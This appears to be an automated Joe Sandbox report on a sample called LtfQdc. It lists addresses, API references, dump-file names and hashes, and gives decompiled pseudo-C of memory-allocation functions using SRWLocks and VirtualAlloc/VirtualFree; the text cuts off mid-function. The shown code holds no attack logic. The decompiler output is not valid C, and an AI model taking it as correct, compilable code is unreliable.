0x00cd272b
0x00000000
0x00cd2639
0x00cd2774
0x00cd2774
0x00cd278a
0x00cd278a
0x00cd2790
0x00cd2793
0x00cd2797
0x00cd279d
0x00cd279f
0x00cd27a3
0x00cd27a3
0x00cd27a8
0x00cd27ac
0x00cd27ae
0x00cd27b0
0x00cd27b2
0x00cd28e0
0x00cd28f6
0x00cd28fb
0x00cd28ff
0x00cd2901
0x00000000
0x00000000
0x00cd292c
0x00cd292e
0x00cd2934
0x00cd293b
0x00cd29b8
0x00cd293d
0x00cd2940
0x00cd2940
0x00cd2940
0x00cd2949
0x00cd294c
0x00000000
0x00cd27b8
0x00cd27b8
0x00cd27bf
0x00cd27c4
0x00cd27ca
0x00cd27cd
0x00cd27cf
0x00cd27d1
0x00cd27d5
0x00cd2839
0x00cd283b
0x00cd283b
0x00cd283f
0x00cd2841
0x00cd2853
0x00cd2853
0x00cd2855
0x00cd2858
0x00cd285b
0x00cd2865
0x00cd2868
0x00cd286e
0x00cd2874
0x00cd2876
0x00cd2879
0x00cd2880
0x00cd2886
0x00cd288a
0x00000000
0x00cd288a
0x00cd27d7
0x00cd27db
0x00cd27dd
0x00cd27e3
0x00cd27e9
0x00cd2975
0x00cd2975
0x00cd2979
0x00cd297f
0x00cd298d
0x00cd2992
0x00cd2993
0x00cd2993
0x00cd299f
0x00000000
0x00cd299f
0x00cd27f1
0x00cd27f7
0x00000000
0x00000000
0x00cd27fd
0x00000000
0x00cd27fd
0x00cd27b2
0x00cd2577
0x00cd257b
0x00cd257f
0x00cd2582
0x00cd2589
0x00cd277a
0x00cd277e
0x00cd2782
0x00cd2786
0x00000000
0x00cd2786
0x00cd2595
0x00cd2802
0x00cd2806
0x00cd280a
0x00cd280e
0x00cd2815
0x00cd281a
0x00cd281e
0x00cd2822
0x00cd2824
0x00cd25a3
0x00cd25a8
0x00cd25ac
0x00cd25ae
0x00cd25b2
0x00cd25c9
0x00cd25c9
0x00cd25cb
0x00cd25cb
0x00cd25cf
0x00cd25d7
0x00cd25e0
0x00cd25e2
0x00cd25e6
0x00000000
0x00000000
0x00000000
0x00cd25e6
0x00cd25b4
0x00cd25b6
0x00cd25be
0x00cd28b1
0x00cd28b5
0x00cd28bb
0x00cd28c9
0x00cd28ce
0x00cd28cf
0x00cd28d4
0x00cd28db
0x00000000
0x00cd28db
0x00cd25c4
0x00000000
0x00cd25c4
0x00000000
0x00cd282a
0x00cd259b
0x00cd259f
0x00000000
0x00cd259f
0x00cd254c
0x00cd26f6
0x00cd26f6
0x00000000
0x00cd26f6
0x00cd23c7
0x00000000
0x00000000
0x00000000
0x00cd23c7
0x00cd26e1
0x00cd26e1
0x00cd26e2
0x00000000
0x00cd26e2
0x00cd23ae
0x00cd23ae
0x00cd23b0
0x00000000
0x00000000
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD2664
TryAcquireSRWLockExclusive.KERNEL32(?,0000002C,FFFFFFFF), ref: 00CD2797

Part of subcall function 00CC85A0: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CC85EC
Part of subcall function 00CC85A0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 00CC8741

ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD2880
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD29AB

Strings

first, xrefs: 00CD28C4, 00CD2968, 00CD2988

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: first
API String ID: 17069307-2456940119
Opcode ID: a5f38c69fd3121ab478c9a09b0bc38873f2934a04db6ea3aeb8cc049dc8cbbef
Instruction ID: c906d5d5332d78eea4e0755f4699ad67832945f6743e2aa0bd0a839808c5d4f6
Opcode Fuzzy Hash: a5f38c69fd3121ab478c9a09b0bc38873f2934a04db6ea3aeb8cc049dc8cbbef
Instruction Fuzzy Hash: 7C02F0726047418BC318CF28C89077AB7E2BFD4314F19866EEA958B395DB34ED46DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1960 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 370
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00CD1960(void* __edx, void* __fp0, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				signed int _v32;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v69;
				signed int _v72;
				intOrPtr _v76;
				signed int _v77;
				signed int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				signed int _t136;
				signed int _t138;
				signed char _t140;
				signed char* _t141;
				signed int* _t142;
				signed int _t144;
				intOrPtr _t150;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t161;
				void* _t163;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed char* _t179;
				signed int _t184;
				signed int _t189;
				intOrPtr _t199;
				unsigned int _t201;
				intOrPtr* _t209;
				signed int _t210;
				signed int _t213;
				signed int _t223;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed char _t239;
				void* _t241;
				signed int _t247;
				signed int _t261;
				signed int _t262;
				intOrPtr _t267;
				void* _t268;
				signed int _t270;
				signed char* _t271;
				void* _t272;
				intOrPtr* _t274;
				signed int _t287;
				void* _t295;
				void* _t297;

				_t297 = __fp0;
				_t241 = __edx;
				_t267 = _a8;
				_t130 =  *0xd40014; // 0xfbddd969
				_v24 = _t130 ^ _t287;
				_t179 =  *0xd515c0; // 0xd51600
				if(_t179 == 0) {
					L5:
					_t179 = E00CD4240(_t179, _t241, _t267);
				}
				_t268 = _t267 + (( *0xd53ec0 & 1) << 3);
				_t295 = _t268;
				if(_t295 < 0) {
					asm("int3");
					L7:
					_t270 = _t179[0xc] + 1;
					__eflags = _t270;
					L8:
					_t136 = _t179[2] & 0x000000ff;
					__eflags = _t136 - 2;
					_v60 = _t270;
					if(_t136 == 2) {
						_t185 = 0x20;
						__eflags = _t270;
						if(_t270 != 0) {
							asm("bsr ecx, edi");
							_t185 = 0x3f;
							__eflags = 0x20;
						}
						_t138 = 0x20 - _t185;
						_t139 = (_t270 >> ( *(0xd35a40 - _t185) & 0x000000ff) & 0x00000007) + _t138 * 8;
						__eflags = ( *(0xd35a44 + _t138 * 4) & _t270) - 1;
						asm("sbb eax, 0xffffffff");
						_t13 = _t139 + 0xd3580c; // 0x0
						_t278 =  *((_t270 >> ( *(0xd35a40 - _t185) & 0x000000ff) & 0x00000007) + _t138 * 8 + _t13) & 0x0000ffff;
					} else {
						__eflags = _t136 - 1;
						if(_t136 != 1) {
							_t257 = 0x20;
							__eflags = _t270;
							if(_t270 != 0) {
								asm("bsr edx, edi");
								_t257 = 0x3f;
								__eflags = 0x20;
							}
							_t168 = 0x20 - _t257;
							_t230 =  *(0xd35a44 + _t168 * 4) & _t270;
							_t169 = (_t270 >> ( *(0xd35a40 - _t257) & 0x000000ff) & 0x00000007) + _t168 * 8;
							__eflags = _t230 - 1;
							asm("sbb eax, 0xffffffff");
							_t19 = _t169 + 0xd3580c; // 0x0
							_t170 =  *((_t270 >> ( *(0xd35a40 - _t257) & 0x000000ff) & 0x00000007) + _t168 * 8 + _t19) & 0x0000ffff;
							_t270 - 0x41 = _t170 - 0x76;
							_t278 = (_t257 & 0xffffff00 | _t170 - 0x00000076 > 0x00000000) & (_t230 & 0xffffff00 | _t270 - 0x00000041 >= 0x00000000) & 0x000000ff | _t170;
						} else {
							_t232 = _t270 - 0x101;
							_t171 = _t270;
							__eflags = _t232 - 0xfefe;
							if(_t232 <= 0xfefe) {
								__eflags = _t270 == 1;
								if(_t270 == 1) {
									_t239 = 0x20;
								} else {
									asm("bsr ecx, eax");
									_t239 = _t232 ^ 0x0000001f;
								}
								__eflags = 1 - _t270;
								_t171 =  <  ? 1 <<  ~_t239 : 0xbadbb1 >> 2;
							}
							_t285 = 0x20;
							__eflags = _t171;
							if(_t171 != 0) {
								asm("bsr esi, eax");
								_t285 = 0x3f;
								__eflags = 0x20;
							}
							_t261 = 0x20 - _t285;
							_t262 = (_t171 >> ( *(0xd35a40 - _t285) & 0x000000ff) & 0x00000007) + _t261 * 8;
							__eflags = ( *(0xd35a44 + _t261 * 4) & _t171) - 1;
							asm("sbb edx, 0xffffffff");
							_t31 = _t262 + 0xd3580c; // 0x0
							_t238 =  *(_t262 + _t31) & 0x0000ffff;
							_t171 - 0x41 = _t238 - 0x76;
							_t278 = (_t262 & 0xffffff00 | _t238 - 0x00000076 > 0x00000000) & (_t171 & 0xffffff00 | _t171 - 0x00000041 >= 0x00000000) & 0x000000ff | _t238;
							__eflags = _t278;
						}
					}
					_v49 = 0;
					_v56 = 0xffffffff;
					_t247 =  *_t179 & 0x000000ff;
					__eflags = _t247 - 2;
					_v69 = _t247;
					if(_t247 == 2) {
						_t140 =  *0xd43d89 & 0x000000ff;
						__eflags = _t140 & 0x00000001;
						if((_t140 & 0x00000001) != 0) {
							L00CD7BD0(_t179, _t297);
						}
					}
					__eflags = _t179[3];
					_v68 = _t179;
					if(_t179[3] == 0) {
						_t141 = _t179;
						_t181 = (_t278 & 0x0000ffff) << 5;
						goto L50;
					} else {
						_t156 =  *0xd43e38; // 0x0
						_t274 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t156 * 4)) + 0xa0));
						__eflags = _t274 - 2;
						if(_t274 < 2) {
							_push( &_v56);
							_push(_t278 & 0x0000ffff);
							_t144 = E00CD9960(_t179);
							_t247 = _v77 & 0x000000ff;
							__eflags = _t144;
							if(_t144 != 0) {
								L35:
								_t272 =  *((intOrPtr*)(_t181 + 0x10)) + _t144;
								__eflags =  *((char*)(_t181 + 6));
								if( *((char*)(_t181 + 6)) != 0) {
									__eflags = _t144 & 0x00000fff;
									if((_t144 & 0x00000fff) == 0) {
										_t181 = _t247;
										_t209 = (_t144 >> 0x00000009 & 0x00000ff8) + (_t144 & 0xffe00000) + 0x2000;
									} else {
										_t77 = _t144 - 4; // -4
										_t209 = _t77;
									}
									 *_t209 = 1;
								}
								__eflags = _t247 - 2;
								if(_t247 == 2) {
									_t201 = _t144 >> 0x15;
									__eflags =  *((short*)(_t201 + _t201 + 0xd42d24)) - 0xfffe;
									if( *((short*)(_t201 + _t201 + 0xd42d24)) == 0xfffe) {
										_t278 = _t144 & 0xffe00000;
										_t247 = 3 << (_t144 >> 0x00000002 & 0x0000001e);
										_t144 = _t144 >> 0x00000005 & 0x0000fffc;
										asm("lock or [eax+esi+0x4000], edx");
									}
								}
								L40:
								__eflags = _v32 ^ _t287;
								E00CFE643(_t144, _t181, _v32 ^ _t287, _t247, _t272, _t278);
								return _t272;
							}
							L47:
							_t184 = _t278 & 0x0000ffff;
							L49:
							_t181 = _t184 << 5;
							__eflags = _t181;
							_t141 = _v64;
							L50:
							_t278 =  &(( &(_t141[_t181]))[0x48]);
							_t92 =  &(_t141[0x40]); // 0x40
							_t271 = _t92;
							__imp__TryAcquireSRWLockExclusive(_t271);
							__eflags = _t141;
							if(_t141 == 0) {
								L00CC8B90(_t141, _t271);
							}
							_t142 =  *_t278;
							_t189 =  *_t142;
							__eflags = _t189;
							if(_t189 == 0) {
								L64:
								_t144 = L00CD87D0(_t278, _v72, 0, _v64, 0x4000,  &_v53); // executed
								_v88 = _t144;
								__eflags = _t144;
								if(_t144 == 0) {
									goto L67;
								}
								_t142 = (_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) - (( *((_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
								_t181 = _v72;
								goto L59;
							} else {
								_v53 = 0;
								_t247 =  *_t189;
								__eflags = _t247;
								_v68 = _t189;
								if(_t247 == 0) {
									_t210 = 0;
									__eflags = 0;
									L58:
									_t181 = _v72;
									 *_t142 = _t210;
									_t213 = _t142[3] & 0xffffc001 | _t142[3] + 0x00000002 & 0x00003ffe;
									__eflags = _t213;
									_t142[3] = _t213;
									L59:
									_t150 =  *((intOrPtr*)(_t181 + 0x117c)) +  *((intOrPtr*)(_t142[2] + 0xc));
									 *((intOrPtr*)(_t181 + 0x117c)) = _t150;
									_t199 =  *((intOrPtr*)(_t181 + 0x1180));
									__eflags = _t199 - _t150;
									_t151 =  >  ? _t199 : _t150;
									 *((intOrPtr*)(_t181 + 0x1180)) =  >  ? _t199 : _t150;
									__imp__ReleaseSRWLockExclusive(_t271);
									_t247 = _v77 & 0x000000ff;
									_t144 = _v72;
									goto L35;
								}
								_t278 = _t189;
								_v64 =  *((intOrPtr*)(_v72 + 0x48 + _t181 + 0xc));
								_t210 = _t247;
								asm("bswap ecx");
								_t181 = _t210 ^ _t189;
								__eflags = (_t210 ^ _t189) - 0x1fffff;
								if((_t210 ^ _t189) > 0x1fffff) {
									L66:
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t271 =  &_v52;
									_t153 = E00CC88D0(_t271, "first", _t247, 0);
									_push(_t271);
									E00C90790(_t153);
									_t144 = E00CC8960(_v76, _t297);
									L67:
									__imp__ReleaseSRWLockExclusive(_t271);
									_t272 = 0;
									goto L40;
								}
								_t181 = _t210 & 0x001fc000;
								__eflags = _t210 & 0x001fc000;
								if((_t210 & 0x001fc000) == 0) {
									goto L66;
								}
								asm("prefetcht0 [ecx]");
								goto L58;
							}
						}
						 *((intOrPtr*)(_t274 + 8)) =  *((intOrPtr*)(_t274 + 8)) + 1;
						asm("adc dword [edi+0xc], 0x0");
						_t184 = _t278 & 0x0000ffff;
						__eflags =  *0xd42d20 - _t278; // 0x1f
						if(__eflags < 0) {
							 *((intOrPtr*)(_t274 + 0x28)) =  *((intOrPtr*)(_t274 + 0x28)) + 1;
							asm("adc dword [edi+0x2c], 0x0");
							 *((intOrPtr*)(_t274 + 0x18)) =  *((intOrPtr*)(_t274 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							goto L49;
						}
						_t159 =  *(_t274 + 0x58 + _t184 * 8);
						__eflags = _t159;
						_v64 = _t278;
						if(_t159 == 0) {
							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
							asm("adc dword [edi+0x24], 0x0");
							 *((intOrPtr*)(_t274 + 0x18)) =  *((intOrPtr*)(_t274 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							E00CC85A0(_t274, _t184);
							_t159 =  *(_t274 + 0x58 + _t184 * 8);
							__eflags = _t159;
							if(_t159 != 0) {
								L30:
								_t278 =  *(_t274 + 0x5e + _t184 * 8) & 0x0000ffff;
								_t247 = _t159;
								_t161 =  *_t159;
								__eflags = _t161;
								if(_t161 == 0) {
									_t223 = 0;
									__eflags = 0;
									L34:
									 *((char*)(_t274 + 0x5c + _t184 * 8)) =  *((char*)(_t274 + 0x5c + _t184 * 8)) - 1;
									 *(_t274 + 0x58 + _t184 * 8) = _t223;
									_v56 = _t278;
									 *_t274 =  *_t274 - ( *(_t274 + 0x5e + _t184 * 8) & 0x0000ffff);
									_t181 = _v68;
									_t144 = _t247;
									_t247 = _v69 & 0x000000ff;
									_t278 = _v64;
									__eflags = _t144;
									if(_t144 == 0) {
										goto L47;
									}
									goto L35;
								}
								_t223 = _t161;
								asm("bswap ecx");
								__eflags = _t223 & 0x001fc000;
								if((_t223 & 0x001fc000) == 0) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t271 =  &_v48;
									_t163 = E00CC88D0(_t271, "first", _t161, 0);
									_push(_t271);
									E00C90790(_t163);
									E00CC8960(_t278, _t297);
									goto L64;
								}
								asm("prefetcht0 [ecx]");
								goto L34;
							}
							goto L49;
						}
						 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) + 1;
						asm("adc dword [edi+0x14], 0x0");
						goto L30;
					}
				}
				if(_t295 == 0) {
					goto L7;
				}
				_t270 = _t268 + _t179[0xc];
				if(_t270 >= 0) {
					goto L8;
				} else {
					asm("int3");
					asm("ud2");
					goto L5;
				}
			}

0x00cd1960
0x00cd1960
0x00cd196c
0x00cd196f
0x00cd1976
0x00cd197a
0x00cd1982
0x00cd199f
0x00cd19a4
0x00cd19a4
0x00cd1991
0x00cd1991
0x00cd1993
0x00cd19a8
0x00cd19a9
0x00cd19ac
0x00cd19ac
0x00cd19ad
0x00cd19ad
0x00cd19b1
0x00cd19b4
0x00cd19b8
0x00cd19ec
0x00cd19f1
0x00cd19f3
0x00cd19f5
0x00cd19f8
0x00cd19f8
0x00cd19f8
0x00cd19fb
0x00cd1a17
0x00cd1a1a
0x00cd1a1d
0x00cd1a20
0x00cd1a20
0x00cd19ba
0x00cd19ba
0x00cd19bd
0x00cd1a32
0x00cd1a37
0x00cd1a39
0x00cd1a3b
0x00cd1a3e
0x00cd1a3e
0x00cd1a3e
0x00cd1a4f
0x00cd1a5b
0x00cd1a5d
0x00cd1a60
0x00cd1a63
0x00cd1a66
0x00cd1a66
0x00cd1a74
0x00cd1a80
0x00cd19bf
0x00cd19bf
0x00cd19c5
0x00cd19c7
0x00cd19cd
0x00cd19d5
0x00cd19d6
0x00cd1a84
0x00cd19dc
0x00cd19dc
0x00cd19df
0x00cd19df
0x00cd1a9c
0x00cd1a9e
0x00cd1a9e
0x00cd1aa6
0x00cd1aab
0x00cd1aad
0x00cd1aaf
0x00cd1ab2
0x00cd1ab2
0x00cd1ab2
0x00cd1ac3
0x00cd1ad1
0x00cd1ad4
0x00cd1ad7
0x00cd1ada
0x00cd1ada
0x00cd1ae8
0x00cd1af4
0x00cd1af4
0x00cd1af4
0x00cd19bd
0x00cd1af6
0x00cd1afb
0x00cd1b03
0x00cd1b06
0x00cd1b09
0x00cd1b0d
0x00cd1c03
0x00cd1c0a
0x00cd1c0c
0x00cd1c12
0x00cd1c12
0x00cd1c0c
0x00cd1b13
0x00cd1b17
0x00cd1b1b
0x00cd1bf6
0x00cd1bfb
0x00000000
0x00cd1b21
0x00cd1b21
0x00cd1b30
0x00cd1b36
0x00cd1b39
0x00cd1c5e
0x00cd1c5f
0x00cd1c60
0x00cd1c65
0x00cd1c6a
0x00cd1c6c
0x00cd1bbd
0x00cd1bc0
0x00cd1bc2
0x00cd1bc6
0x00cd1bc8
0x00cd1bcd
0x00cd1d7c
0x00cd1d93
0x00cd1bd3
0x00cd1bd3
0x00cd1bd3
0x00cd1bd3
0x00cd1bd6
0x00cd1bd6
0x00cd1bdc
0x00cd1bdf
0x00cd1c1e
0x00cd1c21
0x00cd1c2a
0x00cd1c2e
0x00cd1c41
0x00cd1c46
0x00cd1c4b
0x00cd1c4b
0x00cd1c2a
0x00cd1be1
0x00cd1be5
0x00cd1be7
0x00cd1bf5
0x00cd1bf5
0x00cd1c72
0x00cd1c72
0x00cd1c87
0x00cd1c87
0x00cd1c87
0x00cd1c8a
0x00cd1c8e
0x00cd1c91
0x00cd1c94
0x00cd1c94
0x00cd1c98
0x00cd1c9e
0x00cd1ca0
0x00cd1ca4
0x00cd1ca4
0x00cd1ca9
0x00cd1cab
0x00cd1cad
0x00cd1caf
0x00cd1dcd
0x00cd1de3
0x00cd1de8
0x00cd1dec
0x00cd1dee
0x00000000
0x00000000
0x00cd1e18
0x00cd1e1d
0x00000000
0x00cd1cb5
0x00cd1cb5
0x00cd1cba
0x00cd1cbc
0x00cd1cbe
0x00cd1cc2
0x00cd1cfc
0x00cd1cfc
0x00cd1cfe
0x00cd1cfe
0x00cd1d02
0x00cd1d16
0x00cd1d16
0x00cd1d18
0x00cd1d1b
0x00cd1d24
0x00cd1d27
0x00cd1d2d
0x00cd1d33
0x00cd1d35
0x00cd1d38
0x00cd1d3f
0x00cd1d45
0x00cd1d4a
0x00000000
0x00cd1d4a
0x00cd1cc4
0x00cd1cd1
0x00cd1cd5
0x00cd1cd7
0x00cd1cdb
0x00cd1cdd
0x00cd1ce3
0x00cd1e26
0x00cd1e26
0x00cd1e2a
0x00cd1e30
0x00cd1e3e
0x00cd1e43
0x00cd1e44
0x00cd1e50
0x00cd1e55
0x00cd1e56
0x00cd1e5c
0x00000000
0x00cd1e5c
0x00cd1ceb
0x00cd1ceb
0x00cd1cf1
0x00000000
0x00000000
0x00cd1cf7
0x00000000
0x00cd1cf7
0x00cd1caf
0x00cd1b3f
0x00cd1b43
0x00cd1b47
0x00cd1b4a
0x00cd1b51
0x00cd1c77
0x00cd1c7b
0x00cd1c7f
0x00cd1c83
0x00000000
0x00cd1c83
0x00cd1b57
0x00cd1b5b
0x00cd1b5d
0x00cd1b61
0x00cd1d53
0x00cd1d57
0x00cd1d5b
0x00cd1d5f
0x00cd1d66
0x00cd1d6b
0x00cd1d6f
0x00cd1d71
0x00cd1b6f
0x00cd1b6f
0x00cd1b74
0x00cd1b76
0x00cd1b78
0x00cd1b7a
0x00cd1b91
0x00cd1b91
0x00cd1b93
0x00cd1b93
0x00cd1b97
0x00cd1b9b
0x00cd1ba4
0x00cd1ba6
0x00cd1baa
0x00cd1bac
0x00cd1bb1
0x00cd1bb5
0x00cd1bb7
0x00000000
0x00000000
0x00000000
0x00cd1bb7
0x00cd1b7c
0x00cd1b7e
0x00cd1b80
0x00cd1b86
0x00cd1da0
0x00cd1da4
0x00cd1daa
0x00cd1db8
0x00cd1dbd
0x00cd1dbe
0x00cd1dc8
0x00000000
0x00cd1dc8
0x00cd1b8c
0x00000000
0x00cd1b8c
0x00000000
0x00cd1d77
0x00cd1b67
0x00cd1b6b
0x00000000
0x00cd1b6b
0x00cd1b1b
0x00cd1995
0x00000000
0x00000000
0x00cd1997
0x00cd199a
0x00000000
0x00cd199c
0x00cd199c
0x00cd199d
0x00000000
0x00cd199d

APIs

TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00CD1C98
ReleaseSRWLockExclusive.KERNEL32(00000040), ref: 00CD1D3F
ReleaseSRWLockExclusive.KERNEL32(00000040,?,00000000,?,00004000,00000000), ref: 00CD1E56

Strings

first, xrefs: 00CD1DB3, 00CD1E39

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 049369477883c8bcd248f4102ee9879a7dbf3e824084bd44248d4559e05495ca
Instruction ID: d2a01f858509d3ece15c14f198989d520eb41fcbdf53c0d50e5847ced6e2ec48
Opcode Fuzzy Hash: 049369477883c8bcd248f4102ee9879a7dbf3e824084bd44248d4559e05495ca
Instruction Fuzzy Hash: A5D112B2604741ABD3188F29C89073AB7E2FBC4314F1C866EEE568B795E7349A05D790

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC090 Relevance: 13.6, APIs: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00CDC090(long __ebx, void* __ecx, long __edx, void* __edi, long __esi, void* __fp0, void* _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v4;
				long _v8;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				long _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t73;
				void* _t74;
				long _t75;
				long _t76;
				void* _t77;
				long _t78;
				void* _t79;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t122;
				long _t123;
				long _t124;
				long _t138;
				signed int _t139;
				signed int _t140;
				void* _t151;
				long _t152;
				void* _t162;
				long _t164;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t184;
				void* _t185;
				void* _t198;

				_t198 = __fp0;
				_t160 = __esi;
				_t138 = __edx;
				_t122 = __ecx;
				_t109 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t185 = _t184 - 0xc;
				_t73 = _a4;
				_t151 = _t73 - 1;
				_v24 = _t151;
				if(_t151 <= 5) {
					__esi = 2;
					switch( *((intOrPtr*)(__edi * 4 +  &M00D364CC))) {
						case 0:
							goto L54;
						case 1:
							__esi = 4;
							goto L54;
						case 2:
							__esi = 0x20;
							goto L54;
						case 3:
							__esi = 0x40;
							goto L54;
					}
				}
				L54:
				__eflags = _t73;
				_t109 = (0 | _t73 != 0x00000000 | 0x00000002) << 0xc;
				_v28 = _t122;
				_t152 = _t138; // executed
				_t74 = VirtualAlloc(_t122, _t138, _t109, 1); // executed
				__eflags = _t74;
				if(_t74 == 0) {
					_v20 = _t152;
					_t75 = GetLastError();
					_t76 =  *0xd54b80;
					 *0xd54b80 = _t75;
					_t162 = 0;
					_t151 = _v28;
					__eflags = _t151;
					if(_t151 == 0) {
						__imp__TryAcquireSRWLockExclusive(0xd54b90);
						__eflags = _t76;
						if(_t76 == 0) {
							L00CC8B90(_t76, 0xd54b90);
						}
						_t77 =  *0xd54b88;
						__eflags = _t77;
						if(_t77 == 0) {
							L64:
							__imp__ReleaseSRWLockExclusive(0xd54b90);
							_t139 = _v24;
							__eflags = _t139 - 5;
							if(_t139 > 5) {
								_t78 = 1;
								_t123 = _v20;
							} else {
								_t123 = _v20;
								switch( *((intOrPtr*)(_t139 * 4 +  &M00D364E4))) {
									case 0:
										goto L70;
									case 1:
										_t78 = 4;
										goto L70;
									case 2:
										__eax = 0x20;
										goto L70;
									case 3:
										__eax = 0x40;
										goto L70;
								}
							}
							L70:
							_t79 = VirtualAlloc(_t151, _t123, _t109, _t78);
							_t162 = _t79;
							__eflags = _t79;
							if(_t79 != 0) {
								goto L56;
							} else {
								 *0xd54b80 = GetLastError();
							}
							goto L58;
						} else {
							_t160 =  *0xd54b8c;
							_t84 = VirtualFree(_t77, 0, 0x8000);
							__eflags = _t84;
							if(_t84 == 0) {
								asm("int3");
								asm("ud2");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t174);
								_t176 = _t185;
								_t85 = VirtualFree(_v28, _v24, 0x4000);
								__eflags = _t85;
								if(_t85 != 0) {
									L75:
									return _t85;
								} else {
									_t85 = GetLastError();
									__eflags = _t85;
									if(__eflags != 0) {
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t174 = _t176;
										_push(_t174);
										_t178 = _t185;
										_t140 = _v24;
										_t164 = _v28;
										_t86 = _v32;
										if(_t140 > 6) {
											_t124 = 1;
											goto L7;
										} else {
											switch( *((intOrPtr*)(_t140 * 4 +  &M00D36498))) {
												case 0:
													L12:
													_t87 = VirtualFree(_t87, _t164, 0x4000);
													if(_t87 != 0) {
														goto L14;
													} else {
														_t87 = GetLastError();
														if(_t87 != 0) {
															asm("int3");
															asm("ud2");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t178);
															_t180 = _t185;
															_push(_t109);
															_push(_t151);
															_push(_t164);
															_t187 = _t185 - 0xc;
															_t155 = _v32;
															_t167 =  ~_t155;
															_t141 = _v36;
															_t114 = _v40;
															__eflags = _t114;
															if(_t114 == 0) {
																_t107 = E00CEC500();
																_t141 = _v8;
																_t114 = (_t107 & _t167) + _v0;
																__eflags = _t114;
															}
															_v36 = _t167;
															_t168 = _t155 - 1;
															_t88 = E00CDC090(_t114, _t114, _t141, _t155, _t168, _t198, _a4, _a8);
															_t188 = _t187 + 8;
															_t156 = _t88;
															__eflags = _t88;
															if(_t88 == 0) {
																__eflags = _t114;
																_t142 = _v8;
																_t89 = _v36;
																if(_t114 == 0) {
																	goto L41;
																} else {
																	goto L23;
																}
															} else {
